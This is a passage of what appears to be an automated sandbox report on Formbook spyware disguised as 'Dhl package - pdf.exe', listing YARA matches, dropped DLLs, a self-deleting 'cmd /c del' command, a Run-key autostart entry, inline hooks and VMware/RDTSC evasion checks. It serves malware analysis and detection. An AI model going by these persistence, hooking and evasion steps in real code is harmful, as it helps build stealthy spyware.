          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053941202_2_05394120
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_0537F9002_2_0537F900
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_054310022_2_05431002
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_0538B0902_2_0538B090
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053AEBB02_2_053AEBB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02D322AE7_2_02D322AE
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02D2DBD27_2_02D2DBD2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02C9EBB07_2_02C9EBB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02D32B287_2_02D32B28
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02D328EC7_2_02D328EC
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02C7B0907_2_02C7B090
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02C920A07_2_02C920A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02D320A87_2_02D320A8
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02D210027_2_02D21002
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02C6F9007_2_02C6F900
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02C841207_2_02C84120
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02D32EF77_2_02D32EF7
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02D2D6167_2_02D2D616
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02C86E307_2_02C86E30
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02D31FF17_2_02D31FF1
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02D2D4667_2_02D2D466
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02C7841F7_2_02C7841F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02D325DD7_2_02D325DD
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02C7D5E07_2_02C7D5E0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02C925817_2_02C92581
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02D31D557_2_02D31D55
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02D32D077_2_02D32D07
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02C60D207_2_02C60D20
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02609E2C7_2_02609E2C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02609E307_2_02609E30
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0261E72D7_2_0261E72D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02602FB07_2_02602FB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0261BD627_2_0261BD62
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02602D887_2_02602D88
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02602D907_2_02602D90
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 02C6B150 appears 35 times
          Source: Dhl package - pdf.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: Dhl package - pdf.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: vbapkgui.dll.0.drStatic PE information: No import functions for PE file found
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: sfc.dllJump to behavior
          Source: 00000002.00000002.230095767.0000000001180000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.230095767.0000000001180000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.229808001.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.229808001.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.230570728.0000000003400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.230570728.0000000003400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.436888718.0000000002600000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.436888718.0000000002600000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.437230631.00000000027B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.437230631.00000000027B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.437784780.0000000002A80000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.437784780.0000000002A80000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/45@3/3
          Source: C:\Users\user\Desktop\Dhl package - pdf.exeCode function: 0_2_004033A9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004033A9
          Source: C:\Users\user\Desktop\Dhl package - pdf.exeCode function: 0_2_00404686 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_00404686
          Source: C:\Users\user\Desktop\Dhl package - pdf.exeCode function: 0_2_00402138 CoCreateInstance,MultiByteToWideChar,0_2_00402138
          Source: C:\Users\user\Desktop\Dhl package - pdf.exeFile created: C:\Users\user\AppData\Roaming\emergencyJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4436:120:WilError_01
          Source: C:\Users\user\Desktop\Dhl package - pdf.exeFile created: C:\Users\user\AppData\Local\Temp\nsc735E.tmpJump to behavior
          Source: Dhl package - pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Dhl package - pdf.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\Dhl package - pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe Conservatory,Piggins
          Source: Dhl package - pdf.exeVirustotal: Detection: 29%
          Source: C:\Users\user\Desktop\Dhl package - pdf.exeFile read: C:\Users\user\Desktop\Dhl package - pdf.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Dhl package - pdf.exe 'C:\Users\user\Desktop\Dhl package - pdf.exe'
          Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe Conservatory,Piggins
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\SysWOW64\cmd.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Dhl package - pdf.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe Conservatory,PigginsJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exeJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\SysWOW64\cmd.exe'Jump to behavior
          Source: C:\Users\user\Desktop\Dhl package - pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeFile written: C:\Users\user\AppData\Roaming\97LP2175\97Llogri.iniJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
          Source: Dhl package - pdf.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: AvVsPkDH.pdbp0 source: AvVsPkDH.dll.0.dr
          Source: Binary string: wntdll.pdbUGP source: cmd.exe, 00000002.00000002.231049453.000000000546F000.00000040.00000001.sdmp, wlanext.exe, 00000007.00000002.437951676.0000000002C40000.00000040.00000001.sdmp
          Source: Binary string: cmd.pdbUGP source: wlanext.exe, 00000007.00000002.439456963.000000000316F000.00000004.00000001.sdmp
          Source: Binary string: AvVsPkDH.pdb source: AvVsPkDH.dll.0.dr
          Source: Binary string: wntdll.pdb source: cmd.exe, wlanext.exe
          Source: Binary string: wlanext.pdb source: cmd.exe, 00000002.00000002.230678739.0000000003506000.00000004.00000020.sdmp
          Source: Binary string: metade.pdb source: nsc735F.tmp.0.dr
          Source: Binary string: wbemDC.pdb source: wbemDC.dll.0.dr
          Source: Binary string: ActiveSyncBootstrap.pdb source: nsc735F.tmp.0.dr
          Source: Binary string: cmd.pdb source: wlanext.exe, 00000007.00000002.439456963.000000000316F000.00000004.00000001.sdmp
          Source: Binary string: cvtres.pdb source: nsc735F.tmp.0.dr
          Source: Binary string: guidgen.pdb source: nsc735F.tmp.0.dr
          Source: Binary string: wlanext.pdbGCTL source: cmd.exe, 00000002.00000002.230678739.0000000003506000.00000004.00000020.sdmp
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_7301561A LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,1_2_7301561A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_73012B95 push ecx; ret 1_2_73012BA8
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_004178F7 pushfd ; iretd 2_2_004178FE
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00414D4C pushad ; iretd 2_2_00414D4D
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_0041CDE5 push eax; ret 2_2_0041CE38
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_004085A9 push esi; iretd 2_2_004085AD
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_0041CE32 push eax; ret 2_2_0041CE38
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_0041CE3B push eax; ret 2_2_0041CEA2
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_0041E6E0 push dword ptr [494A20F8h]; ret 2_2_0041E72B
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_0041CE9C push eax; ret 2_2_0041CEA2
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_0041DFF3 push es; ret 2_2_0041DFFC
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00416FF8 pushfd ; ret 2_2_0041709A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00416FA0 pushfd ; ret 2_2_0041709A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_053CD0D1 push ecx; ret 2_2_053CD0E4
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02CBD0D1 push ecx; ret 7_2_02CBD0E4
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0261DA51 push ss; retf 7_2_0261DA5A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_026178F7 pushfd ; iretd 7_2_026178FE
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0261CE32 push eax; ret 7_2_0261CE38
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0261CE3B push eax; ret 7_2_0261CEA2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0261E6E0 push dword ptr [494A20F8h]; ret 7_2_0261E72B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0261CE9C push eax; ret 7_2_0261CEA2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0261D741 pushad ; iretd 7_2_0261D6F5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02616FF8 pushfd ; ret 7_2_0261709A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02616FA0 pushfd ; ret 7_2_0261709A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_02614D4C pushad ; iretd 7_2_02614D4D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0261CDE5 push eax; ret 7_2_0261CE38
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_026085A9 push esi; iretd 7_2_026085AD
          Source: C:\Users\user\Desktop\Dhl package - pdf.exeFile created: C:\Users\user\AppData\Local\Temp\pntables\cvtres.exeJump to dropped file
          Source: C:\Users\user\Desktop\Dhl package - pdf.exeFile created: C:\Users\user\AppData\Local\Temp\pntables\AvVsPkDH.dllJump to dropped file
          Source: C:\Users\user\Desktop\Dhl package - pdf.exeFile created: C:\Users\user\AppData\Local\Temp\Conservatory.dllJump to dropped file
          Source: C:\Users\user\Desktop\Dhl package - pdf.exeFile created: C:\Users\user\AppData\Roaming\emergency\diffs\ActiveSyncBootstrap.dllJump to dropped file
          Source: C:\Users\user\Desktop\Dhl package - pdf.exeFile created: C:\Users\user\AppData\Roaming\emergency\diffs\metade.dllJump to dropped file
          Source: C:\Users\user\Desktop\Dhl package - pdf.exeFile created: C:\Users\user\AppData\Local\Temp\firms\MicrosoftVisualStudioDesignerInterfaces.dllJump to dropped file
          Source: C:\Users\user\Desktop\Dhl package - pdf.exeFile created: C:\Users\user\AppData\Roaming\emergency\diffs\guidgen.exeJump to dropped file
          Source: C:\Users\user\Desktop\Dhl package - pdf.exeFile created: C:\Users\user\AppData\Roaming\emergency\diffs\vcdeployui.dllJump to dropped file
          Source: C:\Users\user\Desktop\Dhl package - pdf.exeFile created: C:\Users\user\AppData\Roaming\toplist\mode\wbemDC.dllJump to dropped file
          Source: C:\Users\user\Desktop\Dhl package - pdf.exeFile created: C:\Users\user\AppData\Local\Temp\pntables\vbapkgui.dllJump to dropped file
          Source: C:\Users\user\Desktop\Dhl package - pdf.exeFile created: C:\Users\user\AppData\Roaming\emergency\diffs\msdnmui.dllJump to dropped file

          Boot Survival:

          barindex
          Creates an undocumented autostart registry key Show sources
          Source: C:\Windows\SysWOW64\wlanext.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run -ZNHWB7HQBJump to behavior

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x81 0x1E 0xE7
          Overwrites code with unconditional jumps - possibly settings hooks in foreign processShow sources
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6952 base: 77735050 value: E9 EB 61 FB FF Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6952 base: 777350F0 value: E9 5B 61 FB FF Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6952 base: 77735180 value: E9 9B 60 FB FF Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6952 base: 77735190 value: E9 CB 60 FB FF Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6952 base: 777351A0 value: E9 4B 60 FB FF Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6952 base: 7774FEE0 value: E9 9B FF FF FF Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6952 base: 776E33C0 value: E9 FB 6F 00 00 Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6952 base: 776E4760 value: E9 2B 6B 00 00 Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6952 base: 776A6590 value: E9 0B 00 00 00 Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6952 base: 776AB510 value: E9 2B 53 00 00 Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6952 base: 776CC490 value: E9 0B 00 00 00 Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6952 base: 776EEE00 value: E9 E1 52 00 00 Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6952 base: 776EEFD0 value: E9 26 5B 00 00 Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6964 base: 77735050 value: E9 EB 61 FB FF Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6964 base: 777350F0 value: E9 5B 61 FB FF Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6964 base: 77735180 value: E9 9B 60 FB FF Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6964 base: 77735190 value: E9 CB 60 FB FF Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6964 base: 777351A0 value: E9 4B 60 FB FF Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6964 base: 7774FEE0 value: E9 9B FF FF FF Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6964 base: 776E33C0 value: E9 FB 6F 00 00 Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6964 base: 776E4760 value: E9 2B 6B 00 00 Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6964 base: 776A6590 value: E9 0B 00 00 00 Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6964 base: 776AB510 value: E9 2B 53 00 00 Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6964 base: 776CC490 value: E9 0B 00 00 00 Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6964 base: 776EEE00 value: E9 E1 52 00 00 Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6964 base: 776EEFD0 value: E9 26 5B 00 00 Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 6964 base: 77735050 value: E9 EB 61 FB FF Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 6964 base: 777350F0 value: E9 5B 61 FB FF Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 6964 base: 77735180 value: E9 9B 60 FB FF Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 6964 base: 77735190 value: E9 CB 60 FB FF Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 6964 base: 777351A0 value: E9 4B 60 FB FF Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 6964 base: 7774FEE0 value: E9 9B FF FF FF Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 6964 base: 776E33C0 value: E9 FB 6F 00 00 Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 6964 base: 776E4760 value: E9 2B 6B 00 00 Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 6964 base: 776A6590 value: E9 0B 00 00 00 Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 6964 base: 776AB510 value: E9 2B 53 00 00 Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 6964 base: 776CC490 value: E9 0B 00 00 00 Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 6964 base: 776EEE00 value: E9 E1 52 00 00 Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeMemory written: PID: 6964 base: 776EEFD0 value: E9 26 5B 00 00 Jump to behavior
          Source: C:\Users\user\Desktop\Dhl package - pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Windows\SysWOW64\cmd.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmd.exeRDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: 00000000026098E4 second address: 00000000026098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: 0000000002609B4E second address: 0000000002609B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Dhl package - pdf.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00409A80 rdtsc 2_2_00409A80
          Source: C:\Users\user\Desktop\Dhl package - pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pntables\cvtres.exeJump to dropped file
          Source: C:\Users\user\Desktop\Dhl package - pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pntables\AvVsPkDH.dllJump to dropped file
          Source: C:\Users\user\Desktop\Dhl package - pdf.exe